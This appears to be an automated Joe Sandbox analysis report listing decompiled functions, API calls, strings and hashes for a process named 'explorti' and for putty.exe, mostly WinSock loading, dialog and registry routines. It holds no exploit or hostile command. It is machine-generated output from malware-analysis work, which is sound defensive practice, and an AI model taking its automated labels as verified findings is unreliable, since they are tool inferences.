API ID: ___std_exception_copy
String ID: P#($P#(
API String ID: 2659868963-113306838
Opcode ID: 50cb5290353f2a8f3c7ce889a8afe68cf9bf6067307c0bd4a0346f81889aed97
Instruction ID: b0b2128d8ae7ba52b28a11a1c60a77e55712cb48d892fc6931e6194bda32f1db
Opcode Fuzzy Hash: 50cb5290353f2a8f3c7ce889a8afe68cf9bf6067307c0bd4a0346f81889aed97
Instruction Fuzzy Hash: EDF0A0B592020C67C714EAE4E841989B7ACDA15350B508A26F644A7601F7B0FA648B91

Function 00282520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00282552

Strings

P#(, xrefs: 00282547
P#(, xrefs: 0028255D

Memory Dump Source

Source File: 00000005.00000002.2984385861.0000000000281000.00000040.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 00000005.00000002.2984338989.0000000000280000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984385861.00000000002E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984495416.00000000002E9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.00000000002EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000470000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000054A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.0000000000580000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984524213.000000000058E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2984910941.000000000058F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985132069.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2985150826.000000000072B000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_280000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#($P#(
API String ID: 2659868963-113306838
Opcode ID: d31664e02e37dae2a208df3935d018c0de845b0fb4aa6e3b54fcb2cbb27456f4
Instruction ID: a6da6bb9fe39e52af7a5906f6d45ead6954fb23ac05226143f95094d8657494e
Opcode Fuzzy Hash: d31664e02e37dae2a208df3935d018c0de845b0fb4aa6e3b54fcb2cbb27456f4
Instruction Fuzzy Hash: F2F08271D2020D9BCB14DF68E881A8EBBF8AF55300F1082AEE84567340EA705A648FD9

Analysis Process: putty.exePID: 7244, Parent PID: 8160COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.1%
Total number of Nodes:	270
Total number of Limit Nodes:	25

Executed Functions

Function 00BD52B0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BD52EB
GetProcAddress.KERNEL32(74D60000,getaddrinfo), ref: 00BD5308
GetProcAddress.KERNEL32(74D60000,freeaddrinfo), ref: 00BD5323
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BD534D
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00BD5367
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 00BD5382
GetProcAddress.KERNEL32(74D60000,WSAAddressToStringA), ref: 00BD53B4
GetProcAddress.KERNEL32(74D60000,WSAAsyncSelect), ref: 00BD53D6
GetProcAddress.KERNEL32(74D60000,WSAEventSelect), ref: 00BD53F5
GetProcAddress.KERNEL32(74D60000,select), ref: 00BD5414
GetProcAddress.KERNEL32(74D60000,WSAGetLastError), ref: 00BD5433
GetProcAddress.KERNEL32(74D60000,WSAEnumNetworkEvents), ref: 00BD5452
GetProcAddress.KERNEL32(74D60000,WSAStartup), ref: 00BD5471
GetProcAddress.KERNEL32(74D60000,WSACleanup), ref: 00BD5490
GetProcAddress.KERNEL32(74D60000,closesocket), ref: 00BD54AF
GetProcAddress.KERNEL32(74D60000,ntohl), ref: 00BD54CE
GetProcAddress.KERNEL32(74D60000,htonl), ref: 00BD54ED
GetProcAddress.KERNEL32(74D60000,htons), ref: 00BD550C
GetProcAddress.KERNEL32(74D60000,ntohs), ref: 00BD552B
GetProcAddress.KERNEL32(74D60000,gethostname), ref: 00BD554A
GetProcAddress.KERNEL32(74D60000,gethostbyname), ref: 00BD5569
GetProcAddress.KERNEL32(74D60000,getservbyname), ref: 00BD5588
GetProcAddress.KERNEL32(74D60000,inet_addr), ref: 00BD55A7
GetProcAddress.KERNEL32(74D60000,inet_ntoa), ref: 00BD55C6
GetProcAddress.KERNEL32(74D60000,inet_ntop), ref: 00BD55E5
GetProcAddress.KERNEL32(74D60000,connect), ref: 00BD5604
GetProcAddress.KERNEL32(74D60000,bind), ref: 00BD5623
GetProcAddress.KERNEL32(74D60000,setsockopt), ref: 00BD5642
GetProcAddress.KERNEL32(74D60000,socket), ref: 00BD5661
GetProcAddress.KERNEL32(74D60000,listen), ref: 00BD5680
GetProcAddress.KERNEL32(74D60000,send), ref: 00BD569F
GetProcAddress.KERNEL32(74D60000,shutdown), ref: 00BD56BE
GetProcAddress.KERNEL32(74D60000,ioctlsocket), ref: 00BD56DD
GetProcAddress.KERNEL32(74D60000,accept), ref: 00BD56FC
GetProcAddress.KERNEL32(74D60000,getpeername), ref: 00BD571B
GetProcAddress.KERNEL32(74D60000,recv), ref: 00BD573A
GetProcAddress.KERNEL32(74D60000,WSAIoctl), ref: 00BD5759
WSAStartup.WS2_32(00000202,00CA4C54), ref: 00BD5897
WSAStartup.WS2_32(00000002,00CA4C54), ref: 00BD58B5
WSAStartup.WS2_32(00000101,00CA4C54), ref: 00BD58D6

Strings

WSAEnumNetworkEvents, xrefs: 00BD544C
wsock32.dll, xrefs: 00BD52CB
select, xrefs: 00BD540E
bind, xrefs: 00BD561D
inet_ntop, xrefs: 00BD55DF
htons, xrefs: 00BD5506
WSAEventSelect, xrefs: 00BD53EF
send, xrefs: 00BD5699
connect, xrefs: 00BD55FE
recv, xrefs: 00BD5734
WSAAsyncSelect, xrefs: 00BD53D0
inet_addr, xrefs: 00BD55A1
getpeername, xrefs: 00BD5715
ws2_32.dll, xrefs: 00BD52B0
gethostbyname, xrefs: 00BD5563
ntohs, xrefs: 00BD5525
getnameinfo, xrefs: 00BD537C
shutdown, xrefs: 00BD56B8
socket, xrefs: 00BD565B
ioctlsocket, xrefs: 00BD56D7
wship6.dll, xrefs: 00BD5331
WSAStartup, xrefs: 00BD546B
WSACleanup, xrefs: 00BD548A
WSAAddressToStringA, xrefs: 00BD53AE
WSAIoctl, xrefs: 00BD5753
getservbyname, xrefs: 00BD5582
accept, xrefs: 00BD56F6
closesocket, xrefs: 00BD54A9
WSAGetLastError, xrefs: 00BD542D
Unable to initialise WinSock, xrefs: 00BD590A
inet_ntoa, xrefs: 00BD55C0
gethostname, xrefs: 00BD5544
listen, xrefs: 00BD567A
ntohl, xrefs: 00BD54C8
setsockopt, xrefs: 00BD563C
getaddrinfo, xrefs: 00BD52E5, 00BD5302, 00BD5347
htonl, xrefs: 00BD54E7
freeaddrinfo, xrefs: 00BD531D, 00BD5361
Unable to load any WinSock library, xrefs: 00BD5900

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc$Startup$LibraryLoad
String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
API String ID: 1450042416-3487058210
Opcode ID: 306ebcd53faafcb0b60f26714f5dda5594bd28a5406d579caf69e66e19c7eb8c
Instruction ID: 0f5113d17d8ce6fd31265d3972ad117bef2602dc447b70c5bfca5faa25428c04
Opcode Fuzzy Hash: 306ebcd53faafcb0b60f26714f5dda5594bd28a5406d579caf69e66e19c7eb8c
Instruction Fuzzy Hash: FEE11074242B01EBD72C9F65FC69B1E7AA4EB8571DF10416EE806933A0EBF5C5418B28

Function 00BBDE60 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(000000C9), ref: 00BBDF58
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BBDF74
MapDialogRect.USER32(?,00000003), ref: 00BBDFAB
CreateWindowExA.USER32(00000000,STATIC,Cate&gory:,50000000,00000003,00000003,00000062,?,?,000003EF,00000000), ref: 00BBDFEE
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BBE003
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BBE00B
MapDialogRect.USER32(?,00000003), ref: 00BBE035
CreateWindowExA.USER32(00000200,SysTreeView32,00C93707,50010037,00000003,0000000D,00000062,?,?,000003F0,00000000), ref: 00BBE082
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BBE091
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BBE099
_strrchr.LIBCMT ref: 00BBE19E
_strlen.LIBCMT ref: 00BBE1D6
SendMessageA.USER32(?,00001100,00000000,?), ref: 00BBE202
SendMessageA.USER32(?,00001102,-00000001,?), ref: 00BBE226
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BBE279
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BBE286
SendMessageA.USER32(?,0000110C,00000000,00000005), ref: 00BBE2B2
GetDlgItem.USER32(?,?), ref: 00BBE365
DestroyWindow.USER32(00000000), ref: 00BBE36C
KillTimer.USER32(?,000004CE), ref: 00BBE38E
MessageBoxA.USER32(?,00000000,Demo screenshot failure,00000010), ref: 00BBE3B2
SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00BBE406
SetTimer.USER32(?,000004CE,000003E8,00000000), ref: 00BBE4ED

Part of subcall function 00BBF800: SetWindowTextA.USER32(?,?), ref: 00BBF80F
Part of subcall function 00BBF800: GetWindowLongA.USER32(?,000000EC), ref: 00BBF821
Part of subcall function 00BBF800: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00BBF830

Part of subcall function 00BBFD60: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BBFD8B
Part of subcall function 00BBFD60: GetClientRect.USER32(?,?), ref: 00BBFD9D
Part of subcall function 00BBFD60: MapDialogRect.USER32(?), ref: 00BBFDC6

SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BBE60E
InvalidateRect.USER32(?,00000000,00000001), ref: 00BBE619
SetFocus.USER32(?), ref: 00BBE628

Strings

SysTreeView32, xrefs: 00BBE078
Demo screenshot failure, xrefs: 00BBE3AB
@, xrefs: 00BBE294
Cate&gory:, xrefs: 00BBDFE2
STATIC, xrefs: 00BBDFE7
b, xrefs: 00BBE015
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c, xrefs: 00BBE187, 00BBE432
j == ctrl_path_elements(s->pathname) - 1, xrefs: 00BBE18C
firstpath, xrefs: 00BBE437

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message$Send$Window$Rect$Dialog$CreateLongTimer$ClientDestroyFocusIconInvalidateItemKillLoadText_strlen_strrchr
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$b$firstpath$j == ctrl_path_elements(s->pathname) - 1
API String ID: 3050031257-2401460667
Opcode ID: ff817c618bdf659ad621d5ea3d2ca81bff42e60924dd66785813a446ad75259b
Instruction ID: b5fb8eb2dbc6bb59f2acc678e5963733dbc8273c0843429dd40cfb197a528d3f
Opcode Fuzzy Hash: ff817c618bdf659ad621d5ea3d2ca81bff42e60924dd66785813a446ad75259b
Instruction Fuzzy Hash: 2512D3B1604344EFE7219F64DC86FAE7BE5EB84704F004869FA49A72A1E7B1D904CB52

Function 00BA4740 Relevance: 45.6, APIs: 11, Strings: 15, Instructions: 105
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BDBFB0: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00BA479A
GetProcAddress.KERNEL32(00000000,ToUnicodeEx), ref: 00BA47A7
GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 00BA47C6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00BA47E5
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00BA47F2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00BA47FF
GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00BA4828
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00BA4847
GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00BA4854
CoInitialize.OLE32(00000000), ref: 00BA4875
MessageBoxA.USER32(00000000,Failed to initialize COM subsystem,00000000,00000030), ref: 00BA489F

Strings

MonitorFromWindow, xrefs: 00BA47F9
GetSystemMetricsForDpi, xrefs: 00BA4841
FlashWindowEx, xrefs: 00BA4794
%s Fatal Error, xrefs: 00BA4886
GetMonitorInfoA, xrefs: 00BA47DF
PlaySoundA, xrefs: 00BA47C0
Failed to initialize COM subsystem, xrefs: 00BA4898
ToUnicodeEx, xrefs: 00BA47A1
MonitorFromPoint, xrefs: 00BA47EC
user32.dll, xrefs: 00BA475D
AdjustWindowRectExForDpi, xrefs: 00BA484E
shcore.dll, xrefs: 00BA477B
#k, xrefs: 00BA4758
GetDpiForMonitor, xrefs: 00BA4822
winmm.dll, xrefs: 00BA476C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc$InitializeLibraryLoadMessage
String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll$#k
API String ID: 2501503455-2996361279
Opcode ID: de6501328bfbd848b853c73e0a75bbe040982da343db976c7fd57d1fee47dc03
Instruction ID: 997249841c93c6caf238c02f9cc6dff1d43afbe90acc3cbdb430fc7cff2ba7ec
Opcode Fuzzy Hash: de6501328bfbd848b853c73e0a75bbe040982da343db976c7fd57d1fee47dc03
Instruction Fuzzy Hash: 4A3108B2D45794ABD7127B607C56B2E7AE0DB93B09B00007AF80196251FBE4DE018799

Function 00BE8740 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00BE8799
RegisterClassA.USER32(00002808), ref: 00BE87BC
CreateDialogParamA.USER32(?,?,?,00BE8890,00000000), ref: 00BE87FB
SetWindowLongA.USER32(00000000,0000001E,00000000), ref: 00BE8807
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00BE883E
IsDialogMessageA.USER32(00000000,?,?,00000000,00000000,00000000), ref: 00BE884D
DispatchMessageA.USER32 ref: 00BE8854
PostQuitMessage.USER32(?), ref: 00BE8862
DestroyWindow.USER32(00000000,?,00000000,00000000,00000000), ref: 00BE8869

Strings

", xrefs: 00BE877E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message$DialogWindow$CallbackClassCreateCursorDestroyDispatchDispatcherLoadLongParamPostQuitRegisterUser
String ID: "
API String ID: 1405747859-123907689
Opcode ID: bb4412041191791ccfc14d659c3a43ccb9b9eaf4bed7d36de20367254bca018b
Instruction ID: 05bc638476c34e2e1c70a8ab13f900c1df6b08da0c1e429bc8aa38b67bea9fee
Opcode Fuzzy Hash: bb4412041191791ccfc14d659c3a43ccb9b9eaf4bed7d36de20367254bca018b
Instruction Fuzzy Hash: 96315970549784AFD7208F25DD48B1EBBF4FB89744F50482DFA8897290CBB5A805CB46

Function 00C08350 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00C0839E
___from_strstr_to_strchr.LIBCMT ref: 00C083EE
GetUserNameA.ADVAPI32(00000000), ref: 00C08414
GetUserNameA.ADVAPI32(00000000), ref: 00C08440

Strings

secur32.dll, xrefs: 00C08378
sspicli.dll, xrefs: 00C08387
GetUserNameExA, xrefs: 00C08398
Logical name of remote host (e.g. for SSH key lookup):, xrefs: 00C08350

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: NameUser$AddressProc___from_strstr_to_strchr
String ID: GetUserNameExA$Logical name of remote host (e.g. for SSH key lookup):$secur32.dll$sspicli.dll
API String ID: 1511097851-421106942
Opcode ID: 3a43d3ba8fbdb5de0f928e78b24fc7c7dfc6ccd98e418aa36d1a0dd9f9c86b31
Instruction ID: 3db8bb86eb3d4ad641b83c1c9ab5264fe0f796e92f9045aff87bc1223417602b
Opcode Fuzzy Hash: 3a43d3ba8fbdb5de0f928e78b24fc7c7dfc6ccd98e418aa36d1a0dd9f9c86b31
Instruction Fuzzy Hash: 40213771A0830067E7106F21AC0AF2F76949F82F44F05843CF8C69B2E1EFB58948C7A6

Function 00BBFE00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapDialogRect.USER32(?), ref: 00BBFE3D
CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00BBFE77
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00BBFE87
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116,?,?,BUTTON,50000007,00000000,00C93707,?), ref: 00BBFEB3

Strings

LISTBOX, xrefs: 00BBFE8D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$CreateDialogMessageRectSend
String ID: LISTBOX
API String ID: 4261271132-1812161947
Opcode ID: 4da20985681b5c75aa42ee4ef7bd4cea8aa4ad232e405e9d2838fbd838b4d3cd
Instruction ID: e3f8b8ec4e8cc05feaaaf0372397b9772d0ca2624ecb75d9e31f0c4df7e423f3
Opcode Fuzzy Hash: 4da20985681b5c75aa42ee4ef7bd4cea8aa4ad232e405e9d2838fbd838b4d3cd
Instruction Fuzzy Hash: B7212572608301AFDB119F98DC85F6BBBE5FF88740F04482DFA9596261C371D821DB92

Function 00BBF800 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextA.USER32(?,?), ref: 00BBF80F
GetWindowLongA.USER32(?,000000EC), ref: 00BBF821
SetWindowLongA.USER32(?,000000EC,00000000), ref: 00BBF830
GetDlgItem.USER32(?,000003ED), ref: 00BBF83E
DestroyWindow.USER32(00000000), ref: 00BBF849

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Long$DestroyItemText
String ID:
API String ID: 4119185043-0
Opcode ID: 91b653e61a091dd1db01033e60a3c0f9d036f56f3948d2029f115de95ce7fa4a
Instruction ID: 13cc2287ecd5c5d9a63d8065a951303c948e09cc3040eb33186cee2989c15f31
Opcode Fuzzy Hash: 91b653e61a091dd1db01033e60a3c0f9d036f56f3948d2029f115de95ce7fa4a
Instruction Fuzzy Hash: 66E06D70105525EBDB106F29FC1CFEE3A9CEF4A32671482BAF815E60E2DB64890385A4

Function 00BC3820 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BC38C5
SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 00BC38D6

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BC3870
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC386B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: 5a3290eba4671df33be91bbb363e4a06108386252b83e6f8c0040bd75a545a5f
Instruction ID: 31b7fe1a268f248571bfeca192c1ce9b75a05ee1967bc116330d4cf7291da5fb
Opcode Fuzzy Hash: 5a3290eba4671df33be91bbb363e4a06108386252b83e6f8c0040bd75a545a5f
Instruction Fuzzy Hash: D021D370604209EFEB248B04CC85F36B7E6FF89B08F5081ADF509476A1D761ED54CB91

Function 00BC4940 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentProcessExplicitAppUserModelID.SHELL32(00000000,00BA472A), ref: 00BC4958
GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 00BC4980

Strings

Shell32.dll, xrefs: 00BC4964
SetCurrentProcessExplicitAppUserModelID, xrefs: 00BC497A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressCurrentExplicitModelProcProcessUser
String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
API String ID: 3773935857-666802935
Opcode ID: a8b671025e01283ef548382e0b47146671cd8e5796185af8e71169909dd9bcc0
Instruction ID: fd5cffbf1756a2fcd205c58d512f42df58106e9dbabfe0554f22b3a016941434
Opcode Fuzzy Hash: a8b671025e01283ef548382e0b47146671cd8e5796185af8e71169909dd9bcc0
Instruction Fuzzy Hash: 01E092706003038EDB149F76AC69F1F72D8ABA174AB8902BCB420C3160EBF0C550CF25

Function 00BDC110 Relevance: 6.1, APIs: 4, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 00BDC182
RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019), ref: 00BDC196
RegCloseKey.ADVAPI32(?), ref: 00BDC1A6
RegCloseKey.ADVAPI32(?), ref: 00BDC1BA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

